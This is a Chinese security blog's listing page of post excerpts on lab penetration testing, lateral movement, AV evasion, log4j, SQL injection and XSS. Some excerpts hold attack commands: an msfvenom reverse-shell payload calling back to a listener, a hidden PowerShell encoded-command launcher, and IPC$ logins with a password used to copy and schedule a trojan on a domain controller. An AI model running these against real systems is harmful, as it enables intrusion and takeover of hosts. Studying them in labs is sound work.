- 博客(33)
- 收藏
- 关注
RSS订阅原创 一键AI绘画-生成自己想要生成的图片(你懂的)。
https://colab.research.google.com/drive/1_Ma71L6uGbtt6UQyA3FjqW2lcZ5Bjck-#scrollTo=uQBR9zXQGJrn
2022-10-20 16:38:35
24819
8
原创 安全加固指南(系统,数据库,中间件)
https://blog.csdn.net/qq_46717339/article/details/122290495?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522166363720516782425172572%2522%252C%2522scm%2522%253A%252220140713.130102334..%2522%257D&request_id=166363720516782425172572&biz_id=0&utm_med
2022-09-20 12:19:46
4593
1
原创 powershell cs-UTF-16LE编码上线
当我们要上线主机的时候,可能会因为你的代码含有木马字符串,导致无法上线1、 例子powershell.exe -exec bypass -encodedCommand ZQBjAGgAbwAgACIAMQAyADMAIgA=2、原句子3、UTF-16LE编码后 (在powershell上能直接执行)powershell.exe -w hidden -exec bypass -encodedCommand SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAg
2022-07-05 00:20:01
625
原创 sc-计划任务上线木马不成功的原因(但由于任务定义中的限制之一,该任务无法运行)
0x01 前言1\当我们建立完ipc连接shell net use \\192.168.138.138\ipc$ "dc123.com" /user:administrator2、查看连接3、用命令copy 木马过去shell copy C:\phpStudy\PHPTutorial\WWW\public\nw.exe \\192.168.138.138\c$4、用 at \192.168.138.138 16:53:11 c:\1.exe 让域控运行定时任务,5、但等了很久,定时任
2022-02-02 12:55:14
4422
原创 内网渗透-利用frp代理流量后msf攻击内网永恒之蓝漏洞(ms17-010)-永恒之蓝利用失败的原因
0x01 前言当我们进内网的的时候,会遇到永恒之蓝这种漏洞,之前不懂代理的时候,总是不找到怎么利用,等到我学会了流量代理,frp等工具,才慢慢理解各种协议,各种流量方式的通信方式。初级–》frp代理了解进阶–》多层代理0x02 靶场环境靶场搭建0x03 frp简易配置frp 的配置分为两部分,一个是在公网的vps 运行的 frps 程序 一个是在内网运行的frpc 程序,下载地址https://github.com/fatedier/frp/releases/tag/v0.38.0一、
2022-01-18 15:24:28
9961
3
原创 内网渗透-如何利用msf把流量代理进内网-隧道搭建
0x01 前言在攻防演练时,当我们拿下主机时,我们要开始对内网进行渗透,常见的手法有,frp,ew,等代理工具,这里我介绍一个工具 msf 模块中的socket 4a代理工具,这里我使用的是msf 5的版本,好像在使用msf 6的版本一直不成功的样子,所以你们做遇到代理不成功的情况下,可以尝试换个msf 5的版本进行尝试。0x02 生成路由msf操作拓扑图如下首先先生成一个elf 马进行上线 linux 生成木马上线文章—>linux主机生成木马攻击run autoroute -s ip
2022-01-10 14:27:22
6435
原创 msf生成linux elf木马反弹不成功的解决方法
0x01 前言这几天我的msf 要生成linux 的木马 一直反弹不成功,用的是以下的paylaodmsfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.233.131 LPORT=4444 -f elf > mshell.elf我分析了一下报错,这个报错是没问题的,但生成的木马只有250b ,这明显是不0x02 解决问题我刚开始认为是我msf的问题 ,回来验证了一下,我的msf 是6的版本,而这个语句是5的写法,而我启动
2022-01-06 12:01:13
18507
原创 window横向渗透-IPC命令&schtasks 计划任务上线
0x01 条件1、我们获取到目标主机管理员账号密码,并且目标主机的 139,445端口是开启的,0x02 建立ipc协议拷贝cs木马这时候, 我们可以先建立ips 协议,net use \ip\ipc$ 密码 /user:账号例子net use \\192.168.93.10\ipc$ zxcASDqw123!! /user:administrator并使用 net use 查看 ipc 连接盘符映射并把目标的c盘挂载到 我们的E 盘上net use z: \ip\c$ “密码” /
2022-01-05 17:32:37
9678
原创 黄金票据制作-新手入门
0x01 前言相信准备学习内网渗透的人,都会知道有黄金票据这个事情,而黄金票据的原理是和攻击方式,网站说的都一大堆概念,很难懂,这里我说声明一下,黄金票据的作用在于做权限维持 ,原理在于域服务器上有一个krbtgt用户0x02 黄金票据和krbtgt 用户的关系 Golden Ticket(下面称为金票)是通过伪造的TGT(由身份认证服务授予的票据,用于身份认证,存储在内存,默认有效期为10小时),因为只要有了高权限的TGT,那么就可以发送给TGS(票据授予服务)换取任意服务的ST。可以说有了金票
2021-12-27 16:06:09
2230
原创 CVE-2021-44228-log4j2复现详细版本-简单教程。
0x01-前言昨晚爆出的log4j rce 是通过lookup触发的漏洞,但jdk1.8.191以上默认不支持ldap协议,对于高版本jdk,则需要一定的依赖。不过为了给大家最简单的说明,我这里还是用jdk1.8.144的版本来运行。0x02-靶场搭建docker 搭建方式docker pull registry.cn-hangzhou.aliyuncs.com/fengxuan/log4j_vulndocker run -it -d -p 8080:8080 --name log4j_vuln_
2021-12-14 11:07:00
5233
3
原创 内网隧道搭建ksa工具-端对端-无需公网VPS做流量转发
1、前言看雪安全接入(KSA),一款傻瓜式的一键接入私有网络的工具,无论您在任何地点、任何时间、使用任何线路,均可利用这一服务接入自己的私有设备。KSA的服务端和客户端集成在一个可执行文件之中,目前支持Windows、macOS和Linux平台,支持x86/x64、arm(64)和mips(el),树莓派和路由器都可以运行了!2、应用场景你的vps网速过慢,或者没有vps,需要与目标主机搭建一个共同的网关,然后可以互相访问。下载链接Linux客户端下载:KSA_0.80_linux.zipht
2021-11-08 12:29:11
10749
2
原创 免杀制作-教你如何一键制作window-CS上线免杀马(新手推荐)
一、免杀思路应该说每一类型的恶意软件所实施的反检测技术都是不一样的(恶意软件可以分为病毒、木马、僵尸程序、流氓软件、勒索软件、广告程序等),虽然本文会对所有相关的反检测技术都进行介绍,但我们还是会将注意力放在stager阶段的meterpreter这种有效载荷的工具上,因为几乎所有的恶意软件的攻击命令的执行都必须依靠 meterpreter来实施攻击,例如: 提权、凭证窃取、进程迁移、注册表操作和分配更多的后续攻击, 另外,MetasploitFramework是一个缓冲区溢出测试使用的辅助工具,也可以说
2021-10-20 16:06:25
6854
1
原创 渗透测试练习靶场hackthebox——Starting Point Pathfinder攻略(详细版本)
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入欢迎使用Markdown编辑器你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Mar
2021-09-08 20:28:18
4683
原创 网络web渗透工程师-教你怎么喝着茶,把甲方爸爸的活干了。
场景又是一次接外包项目去甲方做渗透的一天,到了现场,发现甲方爸爸的是一家国企,国企的服务器搭建,普遍比较乱,不出所料,第一天去现场,我还以为是他们给资产,我们渗透就行了,结果发现,我们连那个资产对应那个国企的二级部门都不知道。唯一比较全的,就是各部门的资产表,然后刚开始让我们梳理资产。可使用工具D01设备:一个可以进行资产扫描的漏扫,能说明c段的常用端口,并测试端口漏洞。一台垃圾的联想电脑:什么工具都能安装。...
2021-03-10 00:02:06
526
原创 内网渗透信息收集-wmic命令自动收集。
自动收集信息为了简化操作,可以创建一个脚本, 在目标机器上完成流程、服务、用户账号、用户组、网时区等信息的查询工作。网上有很多类似的脚本,当然,我们也可以自己定制一个。在这里,笔者推荐一个利用WMIC收集月标机器信息的脚本。WMIC ( Windows Management Instrumcntation Command-Line, Windows 管理工具命令行)是最有用的Windows命令行工具。在默认情况下,任何版本的Windows XP的低权限用户不能访问WMIC. Windows 7以上版本的
2021-02-06 18:08:51
767
原创 内网信息收集-入门概念
内网信息收集在内网渗透测试环境中,有很多设备和防护软件,例如Bit9、ArcSight、Mandiant 等。它们通过收集目标内网的信息,洞察内网网络拓扑结构,找出内网中最薄弱的环节。信息收集的深度,直接关系到内网渗透测试的成败。1、内网信息收集概述渗透测试人员进人内网后,面对的是一片“ 黑暗森林”。所以,渗透测试人员首先需要对当前所处的网络环境进行判断。判断涉及如下三个方面。我是谁?一对当前机器角色的判断。这是哪?-对当前机器所处网络环境的拓扑结构进行分析和判断。我在哪?-对当前机器所处区域的
2021-02-06 01:00:08
333
原创 web渗透学习目录-新手打开思路
一,基础学习01.基础学习[[编码总结]][[JSON三种数据解析方法]][[js加密,解密]][[Internet保留地址和非保留地址、内网和公网、VNC和UltraVN]]代理[[SOCKS4、SOCKS5和HTTP代理]][[Windows - Netch 使用教程]][[Netch设置端口ip进行转发流量]][[全能终端神器——MobaXterm]]通信协议[[IIOP-百度百科]] 互联网内部对象请求代理协议二、信息收集02.信息收集1.[
2021-01-25 01:29:27
1431
2
原创 unicode ,UTF-8编码总结
文章感受一. 文章来源http://tool.chinaz.com/tools/unicode.aspx二. 理解感受总共有的编码方式有。1.unicode 编码2.UTF-8编码3.unix的时间编码4.native和Ascli编码互转。5.hex编码、解码6.html编码,解码7.base64 编码,解码三. 文章质量四. 问题待解五. 创建时间2020-12-31文章内容![[Pasted image 20201231140941.png]]1.unicode 编码
2021-01-15 11:27:01
325
原创 web 信息收集-必学目录-入门
02.信息收集1.[[信息收集-汇总]] 讲了信息收集需要的东西2.[[信息收集-总结]] 讲红队的信息收集资产的,现在看不懂3.whois查询- [[whois反查]] whoami查询的网站和简介- [[备安查询]] 天眼查的使用和备案查询的网站4.资产收集- 4.1 端口- 4.1.1 [[端口查询]] 常见端口对应服务- 4.1.2 [[端口扫描]] 讲了端口扫描会遇到的问题,和nmap的扫描手法- 4.1.2 [[扫描方式]]
2020-12-24 22:55:31
213
原创 sql注入-access数据库-总结
Access数据库是一种非常简单但是功能完整的数据库,很适合小型网站创建,可以很轻松管理表和列,有很多管理工具手工注入判断注入点1.这里采用墨者学院提供的SQL手工注入漏洞测试环境http://219.153.49.228:40000/new_list.asp?id=12.判断注入点标准三连 ’ ~ and 1 ~ and 0http://219.153.49.228:47744/new_list.asp?id=1' #页面报错http://219.153.49.228:47744/ne
2020-12-15 20:46:15
973
1
转载 access注入入门
文章内容1.判断注入.and 1=1and 1=2或者-0-1 看页面的变化#若带入 and (select count(*) from msysobjects)>0 #由于msysobjects表在access数据库中无权访问所以返回错误--为access数据库http://219.153.49.228:43394/new_list.asp?id=1 and (select count(*) from msysobjects)>0 #错误是因为没有权限#若带入an
2020-12-14 22:01:10
215
原创 xss漏洞实战--放射性xss漏洞总结
1. 查找反射型的xss型的漏洞。放射性xss漏洞一般存在于搜索框哪里,,原理我就不讲了,直接实战啦**1.1 用偏僻字符绕waf我们在找xss漏洞的时候常常会遇到一些waf防护就比如例: 100招商网我们输入最常见的poalay<script>alert(123)</script>出现D盾防护。这时候就出现了 我们应该知道他u盾是防护了什么,什么...
2019-12-12 22:23:16
1183
原创 XSS漏洞挖掘与验证
挖掘的方法:1、手工挖掘方法:靠闭合标签加一些限制绕过等等的标签闭合配合浏览器的测试,因为有时候提交的那些表单里面是限制长度的,所以我们可以:(1)用bp进行抓包改包,进行探测。(2)直接在前端修改源代码进行修改长度限制。挖掘验证思路: 1、先找数据交互的地方 用户输入点、输出点、文件上传地方、flash、在url当中,get的地方,有注入的 地方,这...
2019-12-04 01:19:21
1412
原创 xss过滤总结
一。简述一。简述XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序.例如:1.盗用cookie,获取敏感信息。2.利用植入Flash,通过crossdomain权限设置进一步获取更高权限;或者利用Java等得到类似的操作。3.利用iframe、frame、XMLHttpRequest或上述Flash等方式,以...
2019-12-04 01:09:12
2970
原创 mysql 常用操作指南
mysql建表流程第一步,我们先查看一下所有数据库, show databases;第二步,我们输入使用数据库 ;use sss ;第三步,我们创建表,表里面输入数据列。create table 表名(列,列);第四步 ,查找我们的表 show tables;第五步,往表插入数据,insert into 表名 (列名) values (值);值里面可定于为其他数据 比如md5(值...
2019-11-14 18:56:22
116
原创 SQL手工注入漏洞测试(Sql Server数据库)
1、 题目说是sql server数据库,判断注入点http://219.153.49.228:42713/new_list.asp?id=2 and 1=2报错,说明可以注入2、 exists (select count(*) from sysobjects), sysobjects为sql sever独有数据库3、再来判断列数http://219.153.49.228:...
2019-10-20 00:11:29
270
原创 蓝桥杯单片机怎么拿省一,
前几天就已经开始有师弟过来问我説,蓝桥杯这个东西该怎么准备,准备的时间是多少,所以我想着既然他们问了这些问题,我就把我拿省一的心得,拿出来供大家参考参考。1.蓝桥杯单片机主要考的用一些题目,比比如用温度传感器,超声波,ds1302时钟,ne555,等板上的一些器件进行控制,所以説本质上是很容易的,只要你懂得这些器件的话,再加上一个星期题目的训练,基本你要拿一个省一,并不是什么大问题。2.要准备...
2019-10-08 10:33:57
6633
原创 蓝桥杯单片机怎么入门。
相信有很多小伙伴,在没打蓝桥杯的时候会担心说自己不能拿到蓝桥杯的省赛一等奖,而且会疑惑说蓝桥杯省赛准备多久可以拿到省赛一等奖。所以在这里我做以下分析,和攻略,希望大家可以用到。我刚开始学完 51单片机的时候,听师兄们说有蓝桥杯这个比赛,所以在寒假开始准备,刚开始很懵逼,拿到板子后都不知道怎么用,怎么入手,当时我也是走了波坑才懂的 所以这里我的建议是上blibli学习小蜜蜂的入门编程(关键词搜索...
2019-07-12 11:10:37
7628
1
原创 蓝桥杯单片机组第十届国赛心得
`` 写这篇文档的时候是2019-5-30,距离国赛已经过了5天,我考前准备了10天,拿了个国一等奖,还算对得起自己了吧,所以趁着自己还记得,加上刚考完国赛,所以写一下,以便网友查看。很多同学其实在拿到省一的时候就会出现国赛准备没什么资料的问题,怎么准备,这一点的话我比赛前也遇到了,所以我是加一些相关类的qq群,加完后一般会有一些人在上面发布一些往届的国赛程序题目,你拿这些题目去做完,你就应该...
2019-05-31 00:56:36
5094
2
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人